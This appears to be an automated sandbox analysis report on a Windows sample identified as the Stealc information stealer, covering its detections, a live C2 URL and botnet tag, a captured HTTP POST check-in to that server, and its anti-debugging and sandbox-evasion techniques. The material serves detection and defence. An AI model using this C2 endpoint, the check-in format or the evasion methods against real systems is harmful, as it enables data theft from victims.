
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544500
MD5: ab7d9340bee9cb1f62845fcaea9476cb
SHA1: aadac5ac21e4e0160dca5ac67727ab5bb436b63b
SHA256: 390a2c58405e383d833df9f7bc6c5abcfa292b73e8297ccfe05c043b084ff29b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AB7D9340BEE9CB1F62845FCAEA9476CB)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara matches (Source | Rule | Description | Author):
  • dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
  • 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000003.1803312962.0000000005120000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • Process Memory Space: file.exe PID: 7140 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • Process Memory Space: file.exe PID: 7140 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 0.2.file.exe.4e0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched.

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:Port -> Destination IP:Port | Protocol):
  • 2024-10-29T14:11:19.442782+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49735 -> 185.215.113.206:80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.4e0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EA2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49735 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (body decoded as ASCII):
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECF
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache

    ------CBAKEBGIIDAFIDHIIECF
    Content-Disposition: form-data; name="hwid"

    69523E94770B612331747
    ------CBAKEBGIIDAFIDHIIECF
    Content-Disposition: form-data; name="build"

    tale
    ------CBAKEBGIIDAFIDHIIECF--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php)
Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php1
Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpI
Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpQ
Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpu
Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/B
Source: file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/G
Source: file.exe, file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004E4610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: dlatbedx ZLIB complexity 0.994636372324159
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5QIB3M2K.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2113024 > 1048576
Source: file.exe | Static PE information: Raw size of dlatbedx is bigger than: 0x100000 < 0x198c00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.4e0000.0.unpack, section rights: :EW; .rsrc:W; .idata:W; :EW; dlatbedx:EW; ncjyujoo:EW; .taggant:EW; vs :ER; .rsrc:W; .idata:W; :EW; dlatbedx:EW; ncjyujoo:EW; .taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9BB0 GetProcAddress (x21),LoadLibraryA (x5),GetProcAddress (x7)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2128e0 should be: 0x20b53e
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: dlatbedx
Source: file.exe | Static PE information: section name: ncjyujoo
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB093 push 464B3B47h; mov dword ptr [esp], ecx | 0_2_009AB116
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB093 push 18542B39h; mov dword ptr [esp], esi | 0_2_009AB1CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB093 push 1881A88Ah; mov dword ptr [esp], ecx | 0_2_009AB20C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AB093 push 7BA374A4h; mov dword ptr [esp], esi | 0_2_009AB21F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B30AB push 0B45413Ah; mov dword ptr [esp], edx | 0_2_009B3138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B30AB push edx; mov dword ptr [esp], esi | 0_2_009B3156
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E30F3 push eax; mov dword ptr [esp], edx | 0_2_009E3123
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095F0EF push 01E2FD39h; mov dword ptr [esp], ebx | 0_2_0095F11D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095F0EF push 0F78A9D0h; mov dword ptr [esp], ebx | 0_2_0095F15B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3701E push esi; mov dword ptr [esp], 693405E4h | 0_2_00A37048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3701E push 1B892BD1h; mov dword ptr [esp], edi | 0_2_00A3707F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3701E push 1B8CF3A1h; mov dword ptr [esp], eax | 0_2_00A37087
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3701E push 35E2E4FFh; mov dword ptr [esp], edi | 0_2_00A3709C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3701E push 417918B0h; mov dword ptr [esp], ebx | 0_2_00A370CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3701E push eax; mov dword ptr [esp], ecx | 0_2_00A370E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3701E push 43343203h; mov dword ptr [esp], ebx | 0_2_00A3713A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push ebx; mov dword ptr [esp], edx | 0_2_008761AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push ebx; mov dword ptr [esp], edi | 0_2_008761B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push eax; mov dword ptr [esp], 32B7A65Ah | 0_2_008761BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push edx; mov dword ptr [esp], eax | 0_2_008761C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push esi; mov dword ptr [esp], 67C9EEA0h | 0_2_00876210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push 68497DBDh; mov dword ptr [esp], edi | 0_2_00876226
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push 16EF1105h; mov dword ptr [esp], ebx | 0_2_008762D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00876187 push 0D4E20A8h; mov dword ptr [esp], ebp | 0_2_008762DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095E1BE push 3121B433h; mov dword ptr [esp], edi | 0_2_0095E25A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009491DC push ecx; mov dword ptr [esp], edi | 0_2_0094B386
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF81C7 push ebp; mov dword ptr [esp], 6B57B67Dh | 0_2_00BF81C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF81C7 push edx; mov dword ptr [esp], 67DF4CAFh | 0_2_00BF81E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008631FB push edi; mov dword ptr [esp], ebx | 0_2_00863339
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008631FB push ebp; mov dword ptr [esp], 6378405Bh | 0_2_0086336E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008631FB push 7BEE6C96h; mov dword ptr [esp], edi | 0_2_008633A6
Source: file.exe | Static PE information: section name: dlatbedx entropy: 7.952200303038952

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36220
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE3E0 second address: 7CE3E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE3E6 second address: 7CE3EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE3EB second address: 7CE3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE3F1 second address: 7CDC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b jmp 00007F9FD080A014h 0x00000010 jmp 00007F9FD080A016h 0x00000015 popad 0x00000016 push dword ptr [ebp+122D0725h] 0x0000001c cld 0x0000001d call dword ptr [ebp+122D3AFFh] 0x00000023 pushad 0x00000024 xor dword ptr [ebp+122D3920h], edx 0x0000002a xor eax, eax 0x0000002c sub dword ptr [ebp+122D3080h], ecx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 pushad 0x00000037 xor bh, 00000029h 0x0000003a mov edx, dword ptr [ebp+122D2CD5h] 0x00000040 popad 0x00000041 jmp 00007F9FD080A00Ah 0x00000046 mov dword ptr [ebp+122D2CF1h], eax 0x0000004c jng 00007F9FD080A012h 0x00000052 jmp 00007F9FD080A015h 0x00000057 mov esi, 0000003Ch 0x0000005c jns 00007F9FD080A00Ch 0x00000062 mov dword ptr [ebp+122D3AF4h], esi 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c cld 0x0000006d lodsw 0x0000006f mov dword ptr [ebp+122D3080h], edi 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 stc 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e add dword ptr [ebp+122D3AF4h], edx 0x00000084 nop 0x00000085 push ebx 0x00000086 push eax 0x00000087 push edx 0x00000088 pushad 0x00000089 popad 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CDC5A second address: 7CDC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93C900 second address: 93C904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CA8E second address: 93CADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F9FD0C645F6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 pushad 0x00000014 ja 00007F9FD0C645E6h 0x0000001a jmp 00007F9FD0C645EEh 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F9FD0C645EDh 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93CADA second address: 93CADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F195 second address: 93F1AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F9FD0C645E6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 js 00007F9FD0C645E6h 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F1AC second address: 93F1C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F9FD080A006h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F1C3 second address: 93F1E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F1E5 second address: 93F1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F1EA second address: 93F1F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F3C8 second address: 93F41D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A018h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F9FD080A010h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F9FD080A006h 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9FD080A015h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F41D second address: 93F43C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9FD0EA45B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F9FD0EA45BDh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F43C second address: 93F4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0CB38C8h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F9FD0CB38C7h 0x00000014 pop eax 0x00000015 mov ecx, edx 0x00000017 push 00000003h 0x00000019 xor esi, dword ptr [ebp+122D2D15h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F9FD0CB38B8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b push 00000003h 0x0000003d jbe 00007F9FD0CB38BCh 0x00000043 mov esi, dword ptr [ebp+122D2E39h] 0x00000049 push 9546703Ch 0x0000004e jmp 00007F9FD0CB38BBh 0x00000053 add dword ptr [esp], 2AB98FC4h 0x0000005a call 00007F9FD0CB38BFh 0x0000005f or edi, 353042C3h 0x00000065 pop edi 0x00000066 lea ebx, dword ptr [ebp+1244505Dh] 0x0000006c mov di, bx 0x0000006f push eax 0x00000070 jc 00007F9FD0CB38C8h 0x00000076 push eax 0x00000077 push edx 0x00000078 jno 00007F9FD0CB38B6h 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F4F1 second address: 93F4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F54C second address: 93F57B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9FD0CB38C7h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007F9FD0CB38B8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F9FD0CB38B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F57B second address: 93F57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93F57F second address: 93F5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F9FD0CB38B8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F9FD0CB38C1h 0x00000027 push 00000000h 0x00000029 jmp 00007F9FD0CB38BFh 0x0000002e call 00007F9FD0CB38B9h 0x00000033 jmp 00007F9FD0CB38BBh 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
